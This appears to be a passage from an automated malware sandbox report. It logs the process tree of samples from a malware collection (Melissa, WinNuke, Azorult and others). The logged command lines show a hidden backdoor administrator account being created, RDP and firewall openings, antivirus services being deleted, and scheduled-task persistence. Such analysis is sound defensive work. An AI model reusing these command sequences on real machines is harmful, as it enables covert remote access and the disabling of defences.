  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4184 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1192,i,9829298387769689448,11388286537158055374,131072 /prefetch:8
  2⤵
  PID:2360

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1488

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x148
1⤵
PID:1768

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\Melissa.doc"
1⤵
PID:1952

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k imgsvc
1⤵
PID:2196

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\Melissa.doc"
1⤵
PID:1776
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2748

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:2136

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:2988

C:\Users\Admin\Desktop\WinNuke.98.exe
"C:\Users\Admin\Desktop\WinNuke.98.exe"
1⤵
PID:2608

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2208

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp2_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Pony\metrofax.doc"
1⤵
PID:1872

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
1⤵
PID:1928

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
PID:2952

C:\Users\Admin\Desktop\butterflyondesktop.exe
"C:\Users\Admin\Desktop\butterflyondesktop.exe"
1⤵
PID:1512
- C:\Users\Admin\AppData\Local\Temp\is-1T37V.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-1T37V.tmp\butterflyondesktop.tmp" /SL5="$8023C,2719719,54272,C:\Users\Admin\Desktop\butterflyondesktop.exe"
  2⤵
  PID:2760

C:\Users\Admin\Desktop\butterflyondesktop.exe
"C:\Users\Admin\Desktop\butterflyondesktop.exe"
1⤵
PID:2252
- C:\Users\Admin\AppData\Local\Temp\is-6MLT1.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-6MLT1.tmp\butterflyondesktop.tmp" /SL5="$D016E,2719719,54272,C:\Users\Admin\Desktop\butterflyondesktop.exe"
  2⤵
  PID:2968
- - F:\Butterfly on Desktop\ButterflyOnDesktop.exe
    "F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    PID:2144
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:1880
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1880 CREDAT:275457 /prefetch:2
      4⤵
      PID:3000

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:2020

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:2988

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:732

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:1076

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:3024

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:1940

F:\Butterfly on Desktop\ButterflyOnDesktop.exe
"F:\Butterfly on Desktop\ButterflyOnDesktop.exe"
1⤵
PID:2904

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\README.md
1⤵
PID:1248
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.md
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1552

C:\Users\Admin\Desktop\Mantas.exe
"C:\Users\Admin\Desktop\Mantas.exe"
1⤵
PID:900

C:\Users\Admin\Desktop\Mantas.exe
"C:\Users\Admin\Desktop\Mantas.exe"
1⤵
PID:2736

C:\Users\Admin\Desktop\Azorult.exe
"C:\Users\Admin\Desktop\Azorult.exe"
1⤵
PID:1600
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    PID:628
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      PID:924
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1992
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1420
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:2108
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        
        PID:2152
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        
        PID:2948
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        
        PID:2856
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:2476
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:1804
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        Launches sc.exe
        
        PID:1548
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        Launches sc.exe
        
        PID:828
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        Launches sc.exe
        
        PID:2924
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    PID:2936
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\Programdata\Install\del.bat
      4⤵
      PID:432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1960
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  PID:2964
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    PID:2412
  - - C:\programdata\microsoft\intel\P.exe
      C:\programdata\microsoft\intel\P.exe
      4⤵
      PID:1960
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      PID:2408
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:1720
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\pause.bat" "
        6⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:1292
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:544
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1504
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:432
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:1288
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2684
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:864
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:1620
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        Modifies Windows Firewall
        
        PID:2876
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:2996
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:2980
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:2360
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:2088
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:568
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:2012
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:2232
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:3064
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:2584
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:816
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:2176
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        
        PID:2492
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        Modifies Windows Firewall
        
        PID:2488
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        
        PID:340
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:1596
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Views/modifies file attributes
        
        PID:1784
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2428
  - - C:\ProgramData\Microsoft\Intel\winlog.exe
      C:\ProgramData\Microsoft\Intel\winlog.exe -p123
      4⤵
      PID:340
    - - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        5⤵
        
        PID:2884
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FBB.tmp\7FCC.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2232
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      PID:2840
    - - C:\Programdata\WindowsTask\winlogon.exe
        
        C:\Programdata\WindowsTask\winlogon.exe
        5⤵
        
        PID:2400
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        6⤵
        
        PID:284
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /query /fo list
        7⤵
        
        PID:1412
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
        6⤵
        Indicator Removal: Clear Persistence
        
        PID:2812
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Delete /TN "OfficeSoftwareProtectionPlatform\SvcRestartTask" /F
        7⤵
        
        PID:2536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ipconfig /flushdns
        5⤵
        
        PID:284
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /flushdns
        6⤵
        Gathers network information
        
        PID:2400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c gpupdate /force
        5⤵
        
        PID:2536
      - C:\Windows\system32\gpupdate.exe
        
        gpupdate /force
        6⤵
        
        PID:2732
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1412
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2208
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\programdata\microsoft\temp\H.bat
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c C:\programdata\microsoft\temp\Temp.bat
      4⤵
      PID:2772
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1688
    - - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        5⤵
        Kills process with taskkill
        
        PID:2352
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:2672
- C:\programdata\install\ink.exe
  C:\programdata\install\ink.exe
  2⤵
  PID:2192
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appidsvc
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\sc.exe
    sc start appidsvc
    3⤵
    - Launches sc.exe
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc start appmgmt
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc start appmgmt
    3⤵
    - Launches sc.exe
    PID:2404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
  2⤵
  PID:2204
- - C:\Windows\SysWOW64\sc.exe
    sc config appidsvc start= auto
    3⤵
    - Launches sc.exe
    PID:1756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
  2⤵
  PID:2664
- - C:\Windows\SysWOW64\sc.exe
    sc config appmgmt start= auto
    3⤵
    - Launches sc.exe
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete swprv
  2⤵
  PID:1724
- - C:\Windows\SysWOW64\sc.exe
    sc delete swprv
    3⤵
    - Launches sc.exe
    PID:2616
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop mbamservice
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\sc.exe
    sc stop mbamservice
    3⤵
    - Launches sc.exe
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
  2⤵
  PID:1920
- - C:\Windows\SysWOW64\sc.exe
    sc stop bytefenceservice
    3⤵
    - Launches sc.exe
    PID:2740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
  2⤵
  PID:2092
- - C:\Windows\SysWOW64\sc.exe
    sc delete bytefenceservice
    3⤵
    - Launches sc.exe
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete mbamservice
  2⤵
  PID:2920
- - C:\Windows\SysWOW64\sc.exe
    sc delete mbamservice
    3⤵
    - Launches sc.exe
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete crmsvc
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\sc.exe
    sc delete crmsvc
    3⤵
    - Launches sc.exe
    PID:2536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete "windows node"
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\sc.exe
    sc delete "windows node"
    3⤵
    - Launches sc.exe
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\sc.exe
    sc stop Adobeflashplayer
    3⤵
    - Launches sc.exe
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\sc.exe
    sc delete AdobeFlashPlayer
    3⤵
    - Launches sc.exe
    PID:2240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MoonTitle
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\sc.exe
    sc stop MoonTitle
    3⤵
    - Launches sc.exe
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
  2⤵
  PID:2596
- - C:\Windows\SysWOW64\sc.exe
    sc delete MoonTitle"
    3⤵
    - Launches sc.exe
    PID:1504
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop AudioServer
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\sc.exe
    sc stop AudioServer
    3⤵
    - Launches sc.exe
    PID:2828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete AudioServer"
  2⤵
  PID:1736
- - C:\Windows\SysWOW64\sc.exe
    sc delete AudioServer"
    3⤵
    - Launches sc.exe
    PID:908
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\sc.exe
    sc stop clr_optimization_v4.0.30318_64
    3⤵
    - Launches sc.exe
    PID:3068
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
  2⤵
  PID:324
- - C:\Windows\SysWOW64\sc.exe
    sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - Launches sc.exe
    PID:2416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
  2⤵
  PID:676
- - C:\Windows\SysWOW64\sc.exe
    sc stop MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\sc.exe
    sc delete MicrosoftMysql
    3⤵
    - Launches sc.exe
    PID:2376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
  2⤵
  PID:2404
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:1368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
  2⤵
  PID:2700
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
  2⤵
  PID:2544
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
  2⤵
  PID:2516
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
  2⤵
  PID:1688
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    - Modifies Windows Firewall
    PID:2864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
  2⤵
  PID:3064
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:2744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
  2⤵
  PID:2848
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
  2⤵
  PID:1292
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    - Modifies Windows Firewall
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
  2⤵
  PID:1660
- - C:\Windows\SysWOW64\netsh.exe
